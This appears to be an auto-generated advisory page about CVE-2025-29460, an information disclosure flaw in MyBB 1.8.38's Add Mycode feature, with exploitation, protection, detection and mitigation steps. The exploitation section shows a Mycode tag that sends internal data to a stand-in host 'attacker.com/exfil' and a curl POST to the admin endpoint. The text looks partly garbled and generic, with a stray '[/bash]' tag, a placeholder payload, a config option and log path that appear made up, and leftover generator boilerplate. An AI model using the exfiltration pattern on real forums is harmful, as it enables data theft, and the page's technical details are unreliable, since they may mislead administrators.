Listen to this Post
How CVE-2025-29460 Works
CVE-2025-29460 is an information disclosure vulnerability in MyBB 1.8.38 that allows remote attackers to obtain sensitive data through the Add Mycode function. The flaw occurs due to insufficient input validation, enabling attackers to inject malicious Mycode tags that fetch internal system data. While the vendor disputes the severity due to admin privileges and SSRF mitigations, improper configurations could still expose sensitive details. The CVSS 4.0 score reflects medium risk, emphasizing unauthorized data access under specific conditions.
DailyCVE Form
Platform: MyBB
Version: 1.8.38
Vulnerability: Information Disclosure
Severity: Medium
Date: 04/25/2025
What Undercode Say:
Exploitation
1. Craft malicious Mycode:
[url=http://attacker.com/exfil?data={INTERNAL_DATA}]Click
[/bash]
2. Exploit via POST request:
curl -X POST -d "mycode=malicious_tag" http://target/mybb/admin/add_mycode.php
Protection
1. Input sanitization:
$mycode = htmlspecialchars($_POST['mycode'], ENT_QUOTES);
2. Patch verification:
diff -u /var/www/mybb/inc/plugins/mycode.php patched_file.php
Analytics
- Impacted systems: MyBB forums with custom Mycode enabled.
- Detection: Monitor logs for unusual Mycode additions:
grep "add_mycode" /var/log/mybb/admin.log
Mitigation Commands
1. Disable risky functions:
// Disable remote Mycode in config.php $config['allow_remote_mycode'] = false;
2. Update MyBB:
wget https://mybb.com/download/latest -O mybb_update.zip
References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29460
- MyBB Advisory: Check official patch notes for 1.8.39+ releases.
No additional commentary beyond specified rules.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
